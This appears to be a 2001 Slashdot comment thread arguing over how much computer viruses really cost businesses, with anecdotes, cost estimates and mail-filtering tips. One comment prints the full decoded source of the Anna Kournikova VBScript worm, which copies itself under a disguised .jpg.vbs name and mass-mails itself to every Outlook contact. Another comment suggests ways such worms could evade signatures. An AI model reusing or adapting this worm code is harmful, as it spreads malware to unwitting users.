    Also, you're grossly simplifying the value of restoring from backup and the resulting lack of damage. How "regular" can your backups be before the backup processes interfere with getting the job done? And assuming you're not continuously backing up every keystroke (or other data input or manipulation) as it occurs, there will be data loss between the most recent backup and the time of restoration. Backups are important, but they're not a perfect, complete solution.

    There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.

    I wish that made sense even from a twisted perspective, but it doesn't. I keep hoping this is a joke, but I see it moderated as "Informative" which is a pretty scary thing to consider. Yes, delays in work exist due to phone calls, etc., but to imply that adding more delays has no impact is like saying 1 plus 1 equals 1.

    And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.

    At last, something I can agree with -- the total cost of the Sys Admin's salary shouldn't be attributed to virus recovery. I'm glad you put "total" in your statement, because otherwise we'd be right back to the apparently-facetious claim that adding labor does not add cost.

    Generally speaking, I think virus cost estimates are unreliable eye candy for bored newspeople and anti-virus software vendors. Bigger numbers equal bigger revenue for them, whether through audience attention or software sales. They're eye candy to virus authors too, for that sense of "accomplishment." Actual costs are probably impossible to ascertain and are thus a worthless goal of analysis. It's like putting a specific dollar figure on the earthquake in India -- hey, does the exact damage really matter, or should we just do what we can to help the survivors recover?

  • by technos (73414) on Monday February 12, 2001 @11:14AM (#437245) Homepage Journal
    We've got a few thousand users in fifteen countries. If all infections were like todays spat of VBS/SST.Worm, it'd cost us more money to find the yearly cost than the cost itself.

    But we do tend to get a nasty one about once a year. Win/CIH, ILUVYOU, etc. License costs of all the various scanners runs five figures. Planning, annoying the users to update their definition files, installing the software adds on cost as well.

    Quick fudging says the actual expended cost per user, per year is under $25. (Probably closer to $18, but I'll go high to be safe) Now, if we assume there are 200 million computers in business use in the US, (Once again, high and safe) I only get $5 billion.

    Either the rest of the companies out there are doing a bad job preparing for viruses and a bad job dealing with them, or the $12.1 figure was just pulled out of someones ass.
  • by rkent (73434) <rkent@noSPAM.post.harvard.edu> on Monday February 12, 2001 @11:15AM (#437246)
    Well, I haven't conducted a thorough study throughout the organization, but we *just* got hit by the Anna Kournikova virus, and here's about what happened:
    • I saw 10 messages with the same subject arrive from 10 different people, and said "hmm, a virus, I think I'll delete them."
    • A bunch of other people noticed the same thing, and started yelling over the cubes, "Hey, there's a virus going around, delete it and don't open it!"
    • Everyone did.

    So, I guess you could call that a loss of 10 or 15 minutes of "productivity" for everyone in the company. Oh no, 10 man-hours lost! And at our billing rate...!

    But frankly, not everyone was working anyway. There's at least as much time lost every day to reading online news and talking to friends, not to mention waiting for conference calls, etc etc. The impact was totally negligible, unless this virus had some nasty side effect of deleting all the files on someone's harddrive.

  • by |deity| (102693) on Monday February 12, 2001 @05:41PM (#437247) Homepage
    ... poor software. I think windows should say on the box "insecure by default". Any network program that is designed for end users and not computer geeks should have safety built in. I can see a flaw slipping by the programmers that would allow a worm or security breach. I can't imagine selling a product that is so insecure that anyone with a little experiance can sit down and write a worm/virus/script to exploit, then never admit that the product was flawed.

    Maybe these companies should be able to sue Microsoft, for lost time and money.
  • by swordgeek (112599) on Monday February 12, 2001 @12:20PM (#437248) Journal
    Here's an example.

    Small company of 100 people, open 250 days/year.
    Annual GROSS income $5 million.
    $5m/250days/8hours = $2500/hr.

    Virus comes in, hits 24 people.
    Sysadmin can fix a machine in 15 minutes, making for six hours of work. That's $15000 in lost revenue!!! Then add on the salary for the sysadmin and the staff when they're not working, and you've got 12hr at $50/hr (average salary,
    including the CEO, who makes $2million in stock options), or another $600. Wow, almost $16k for a small company!!! (interesting aside: $16000/24 people comes to $666/person :-> )

    Now, let's look at this rationally. The sysadmin (a) can probably do several machines simultaneously, and (b) is already getting paid for this sort of thing. It's his job! Then there's the staff, who for their 15 minutes of downtime might take their allotted coffee break, or maybe even do some (gasp!) paperwork!

    For non-destructive viruses, I would guess the average cost to be about $5/seat infected. A far cry from the $666/seat calculated above. Here are some of the flaws that lead to this discrepancy:

    1) All work time is computer time for all staff infected.
    2) Time spent repairing the damage is outside of normal duties for the admin.
    3) All staff work at 100% efficiency all of the time.
    4) Time spent repairing the damage can't be done when the staff aren't around.

    In other words, the numbers quoted are nothing more than so much bullshit.

  • by zootie (190797) on Monday February 12, 2001 @11:42AM (#437249)
    You figured it out. It adds the registry entry to know if the system has been infected before, then e-mails itself to everybody in your address list. If it is Jan 26th, it opens that web page. Yes, it's weird that it tries to open that web page in the past, but who knows (maybe the author released it in the wild back then, and only now hit corporate servers).

    McAfee seems to detect it (I'm not sure if by heuristics or if it has the signature), but Norton AntiVirus doesn't detect it...

    What's interesting is how it decodes itself from the string. I kind of remember a couple VBS virus doing that earlier.

    It could be much worse. Many of these script viruses could be enhanced so the vbs extension doesn't show, and to use a variable encoding keys, which would make it harder to create signatures.
  • by micromoog (206608) on Monday February 12, 2001 @11:53AM (#437250)
    This isn't caused by virus myths per se, it's caused by lack of user education.

    Any time you have an incident like this, go see the user personally with a pair of handcuffs and a 2x4. Gradually, as users become more enlightened about IS policy, you will see a decrease in these types of messages.

  • by update() (217397) on Monday February 12, 2001 @11:18AM (#437251) Homepage
    Hmm...what you're saying is that viruses shouldn't cost you anything because full backups should be instantly available. That's true, but the fact is that they aren't. For one thing, when a virus spreads during the day (which it will) that day's work is lost as you go back to the previous night's backup, or the one before that, to be on the safe side. And that's the best case scenario -- I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.

    Hey, street crime wouldn't cost anything if people all stayed inside.

  • by clinko (232501) on Monday February 12, 2001 @10:57AM (#437252) Homepage Journal
    This Is pretty funny and related to the topic. It's a map of where virus'? viri? whatever... attack...
    Basically A map of stupidity...
    Is Your State Stupid? [mcafee.com]

  • by omega_rob (246153) on Monday February 12, 2001 @11:02AM (#437253)
    I don't think I've personally lost much in the way of time or effort as a result of a virus, although I've seen my employer get burned a few times (notably with the "I Love You" bug).

    Mostly I've been losing my freaking sanity from listening to my uber-geeky previous boss trying to "keep on top" of each virus. He does his own insightful analysis of the thing ("a-ha!this attachment is really a VB script!") He scours the web, digging up all the information that's readily available to anyone who wants to look for it, then spams the entire team for days on end with a torrent of "informative" e-mails that put the original virus to shame.

    I bet you all have this same guy working in your office. Admit it, it's probably you.

    omega_rob -- friend of the bonsai kitten

  • by Ben Schumin (312122) on Monday February 12, 2001 @11:06AM (#437254)
    If you don't understand how this could cost money, you've obviously never worked in a large corporate environment. An example, a company I worked at got an email vbs "virus" recently. Let's count out where the money comes from.
    • Thousands of users receive thousands of messages in their email box.
    • MIS has to go to 'infected' machines and clean each of them.
    • MIS has less time to address other important issues, blocking other people from completing tasks.
    • While MIS is fixing a machine, that user is less productive, if not completely unproductive.
    • Some users have unbacked up important data on their machines. This data can be destroyed. If someone worked on a project for two days, you're talking 16 hours of paid work lost completely. Multiply this across the entire organization.
    • Prevention costs: Site licenses or per user licenses for virus scanning solutions are expensive and rarely catch new vbs viruses.
    • Small businesses are also hit hard, because often there is no one at the location who has aclue what to do about the problem, so they have to hire some overpriced consultant to run a virus scan and clean their machines for them.

    It's not all that complicated of a concept, why do you need it broken down for you? Some Linux users are so naive about the real world.

  • by Anonymous Coward on Monday February 12, 2001 @11:10AM (#437255)
    I consider a financial "loss" to be anything which I can claim on my taxes at the end of the year. Nothing else constitutes real loss.

    Therefore things like software piracy, virus attacks, are not losses.

    Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accoutanta don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and thay claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.

    If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.

  • ...is zero.

    The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.

    This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

    So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.

    Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.

    There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.

    Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.

  • Is that getting accurate figures, at least from anti-virus companies/agencies, is going to be difficult. After all, the more serious they play out the problem to be, the more people are going to buy their products.

    Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected [vmyths.com], which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saing that only 10,000 machines had been hit.

    </rant>

    --

  • by Ralph Wiggam (22354) on Monday February 12, 2001 @11:19AM (#437258) Homepage
    A few years ago, the company I work for was hit by Happy99. It was a stupid little virus that infected your Winsock32.dll and sent itself to everyone on emailed. It made a backup of your uninfected dll, kept a text file of every email address it had sent itself to and was generally a polite virus. The company only had about 15 workstations at the time and it was no trouble cleaning up. The real problem was that I had to call a few dozen clients and tell them that our stupid client service people had sent them a virus. We looked like complete idiots. It turns out that only a couple of the client folks were infected and I could talk them through a cleanup over the phone. But of course those clients had sent infected emails to a few of their clients. So even the clients we didn't infect knew we had screwed up and the ones we did infect were severely pissed. I don't think anyone dropped up that week, but when our contracts came up for renewal who knows if our virus problem had an influence. So the direct cost of the virus was only a couple hours of my time. The hit to our reputation may have cost us tens or hundreds of thousands of dollars.

    -B
  • by Tower (37395) on Monday February 12, 2001 @11:29AM (#437259)
    Further proof that nobody in North Dakota owns a computer... and if they did, they would still need phone lines to connect and get a virus.
    --
  • by Ungrounded Lightning (62228) on Monday February 12, 2001 @12:47PM (#437260) Journal
    Viruses are probably even MORE costly. Consider:

    - A virus comes in and trashes some files/configs, etc. Some people's work is lost forever and has to be redone. Those people lose days.
    - The sysadmins take down the mail server and clean things out. The whole company's email is out of service for hours.

    and so on.

    Let's suppose it's a high-tek company on the rise. And lets suppose this delays its product introduction by one day.

    Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.

    Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.

    Finally, compute how much money you'd have to put in an account at prevailing interest rates to be able to take out all that money at the time the graph shows it. THAT's the cost of the virus hit - on THAT COMPANY.

    (If there are any places where the graph WITH the virus hit is higher than the one without, it represents a deposit rather than a withdrawal. The account should go to zero when the company without the hit folds.)

    Of course predicting the actual cost means accurately predicting two futures and taking the difference. So coming up with a number is crystal-ball reading.

    Computing the PROVABLE direct loss is another story entirely.
  • by donutello (88309) on Monday February 12, 2001 @01:33PM (#437261) Homepage
    Virus myths: Ahh the good old days when the Good Times [doe.gov] virus was clearly a hoax - unless you believed it in which case you would forward it around, fulfilling the prophecy!
  • by zootie (190797) on Monday February 12, 2001 @11:06AM (#437262)
    I don't have costs on viruses out there> I thought it might be interesting looking at the source code of the OnTheFly virus, which was unleashed on us this morning. This is the code after the virus decodes it from a string

    <BLOCKQUOTE>
    'Vbs.OnTheFly Created By OnTheFly
    On Error Resume Next
    Set E7O3tH65p4P = CreateObject("WScript.Shell")
    E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
    Set rOwamTjngb5= Createobject("scripting.filesystemobject")
    rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolde r(0)& "\AnnaKournikova.jpg.vbs"
    if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
    e2nSA7HlgLC()
    end if
    if month(now) =1 and day(now) =26 then
    E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
    end if
    Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
    ZN5JKZ4xiuV= JKgSwHK773x.readall
    JKgSwHK773x.Close
    Do
    If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
    Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True)
    UeI22z8P4v0.writeZN5JKZ4xiuV
    UeI22z8P4v0.Close
    End If
    Loop
    Function e2nSA7HlgLC()
    On Error Resume Next
    Set D23OvxM6KRH = CreateObject("Outlook.Application")
    If D23OvxM6KRH= "Outlook"Then
    Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
    Set S6k211ge33L= j25tNZB9f8l.AddressLists
    For Each JR2mPsM2BmR In S6k211ge33L
    If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
    d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
    For X789Va3zRez= 1 To d4BD3xgwv1J
    Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
    Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
    iq72b483v3Z.To = OIE4BVYjOJ8.Address
    iq72b483v3Z.Subject = "Here you have, ;o)"
    iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
    set fWsnq8YG9f1=iq72b483v3Z.Attachments
    fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
    iq72b483v3Z.DeleteAfterSubmit = True
    If iq72b483v3Z.To <> "" Then
    iq72b483v3Z.Send
    E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
    End If
    Next
    End If
    Next
    end if
    End Function
    'Vbswg 1.50b
    </BLOCKQUOTE>
  • by NetJunkie (56134) <jason@nash.gmail@com> on Monday February 12, 2001 @11:07AM (#437263)
    It can cost a lot when a business gets hit hard by a virus..but it shouldn't.

    Take today for example..that big new scary .vbs virus is running around but we are protected. Why? Not because we run Linux (We do..just not most people), but because I block *ALL* .vbs attachments coming in our network. Easy to do..works damn well. I have 14 hits of this new virus in our log but none of my users are the wiser.

    As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.

    If you're not blocking .vbs files TODAY, you need to be asking why not.
  • by SpanishInquisition (127269) on Monday February 12, 2001 @11:01AM (#437264) Homepage Journal
    Windows ME sells for 169.99 at Amazon.com
  • by tenzig_112 (213387) on Monday February 12, 2001 @11:00AM (#437265) Homepage
    That's the real question.

    As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.

    argh! [ridiculopathy.com]

If a thing's worth having, it's worth cheating for. -- W.C. Fields

Working...